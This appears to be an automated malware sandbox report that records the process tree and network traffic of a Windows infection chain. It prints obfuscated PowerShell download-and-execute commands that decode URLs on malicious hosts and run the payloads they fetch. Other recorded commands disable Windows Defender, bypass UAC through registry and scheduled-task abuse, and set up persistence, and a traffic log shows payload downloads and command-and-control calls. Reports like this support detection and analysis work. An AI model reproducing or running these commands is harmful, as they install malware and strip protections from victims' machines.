C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:3680
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
PID:4652
-
-
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4668 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\523709105068992\\* & exit8⤵PID:4788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46689⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
-
-
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4180 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵PID:5280
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵PID:5020
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
PID:4120
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
PID:4392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵PID:2428
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:3196
-
-
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2424 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\rnwabiyd.inf9⤵PID:2300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4004 -
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:3312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mkx.exe"7⤵PID:4124
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:2564
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:5108
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\vokybpfg.exe2⤵PID:4136
-
C:\Windows\temp\vokybpfg.exeC:\Windows\temp\vokybpfg.exe3⤵
- Executes dropped EXE
PID:4924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\wmimpxhi.exe2⤵PID:2976
-
C:\Windows\temp\wmimpxhi.exeC:\Windows\temp\wmimpxhi.exe3⤵
- Executes dropped EXE
PID:6092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵PID:960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵PID:4320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵PID:2128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵PID:5916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵PID:5624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵PID:5876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵PID:2420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵PID:6140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵PID:3724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵PID:3984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵PID:4384
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
PID:4560
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\d3ddde34bd2148579399e0ec6b9aecac /t 416 /p 5041⤵PID:5884
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a5dd4706d9064727a4d6b934f7cb734a /t 2972 /p 29681⤵PID:5984
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6088
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2240
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5800
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5668
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b1819abdb2684d88930136de7e580d56 /t 2328 /p 58001⤵PID:5460
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\79b9954a1bc942248a851d20a38d1381 /t 2720 /p 22401⤵PID:4640
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:356
Network
-
Remote address:8.8.8.8:53Requestbit.doIN AResponsebit.doIN A54.83.52.76
-
Remote address:8.8.8.8:53Requestpdshcjvnv.ugIN AResponse
-
Remote address:8.8.8.8:53Requestrbcxvnb.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestzxvbcrt.ugIN AResponse
-
Remote address:54.83.52.76:80RequestGET /fqhJD HTTP/1.1
Host: bit.do
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 308
Connection: keep-alive
Location: http://agentt.ac.ug/zxcv.EXE
-
Remote address:54.83.52.76:80RequestGET /fqhHT HTTP/1.1
Host: bit.do
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 306
Connection: keep-alive
Location: http://nicolas.ug/zxcv.EXE
-
Remote address:54.83.52.76:80RequestGET /fqhJv HTTP/1.1
Host: bit.do
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 316
Connection: keep-alive
Location: http://courtneyjones.ac.ug/zxcvb.exe
-
Remote address:8.8.8.8:53Requestagentt.ac.ugIN AResponseagentt.ac.ugIN A217.8.117.77
-
Remote address:8.8.8.8:53Requestcourtneyjones.ac.ugIN AResponsecourtneyjones.ac.ugIN A217.8.117.77
-
Remote address:8.8.8.8:53Requestnicolas.ugIN AResponsenicolas.ugIN A217.8.117.77
-
Remote address:217.8.117.77:80RequestGET /zxcv.EXE HTTP/1.1
Host: agentt.ac.ug
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:29 GMT
ETag: "149000-5b3c379edbb12"
Accept-Ranges: bytes
Content-Length: 1347584
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /zxcv.EXE HTTP/1.1
Host: nicolas.ug
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:29 GMT
ETag: "149000-5b3c379edbb12"
Accept-Ranges: bytes
Content-Length: 1347584
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /zxcvb.exe HTTP/1.1
Host: courtneyjones.ac.ug
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:26 GMT
ETag: "11e600-5b3c379c835ab"
Accept-Ranges: bytes
Content-Length: 1172992
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requesttelete.inIN AResponsetelete.inIN A195.201.225.248
-
Remote address:195.201.225.248:443RequestGET /brikitiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:43:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=26f50a0e652318303c_11806780713615765570; expires=Thu, 19 Nov 2020 13:43:57 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000
-
Remote address:8.8.8.8:53Requestpuffpuff423.topIN AResponsepuffpuff423.topIN A104.27.132.115puffpuff423.topIN A104.27.133.115puffpuff423.topIN A172.67.197.203
-
Remote address:104.27.132.115:443RequestPOST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d961db2b00896b64654aa02763ce6303f1605707037; expires=Fri, 18-Dec-20 13:43:57 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32130400000bfd3e22c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AVI1Y9u1uC7X5vKN%2Fz4%2BU0ls843ISwsrFQ%2BjEKTssUm0INfTjnl%2BW9VaUOSeMlaxkznjf73gqlqQq2B6zppENwEvVoSlwE0807w%2BV82AqWk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421f980acc0bfd-AMS
-
GEThttps://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94mkx.exeRemote address:104.27.132.115:443RequestGET //l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Set-Cookie: __cfduid=d961db2b00896b64654aa02763ce6303f1605707037; expires=Fri, 18-Dec-20 13:43:57 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-dfcff"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32150a00000bfd35250000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tiTohd66eO03xBuMn%2Fcwo4stXWXxNlVl%2BG83PNO6Rruh6Tu%2FCvt8Bh3uhrYCYyeGqZkVU16A4VUQHscjuUz3%2BEyPZTVrhTjJXpM7sbQb6Xk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421f9b4bd40bfd-AMS
-
GEThttps://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2mkx.exeRemote address:104.27.132.115:443RequestGET //l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Set-Cookie: __cfduid=d931992b99da4bd28e8ddddbd72b3df3c1605707039; expires=Fri, 18-Dec-20 13:43:59 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-2b281b"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d321ba600000bfdf2215000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
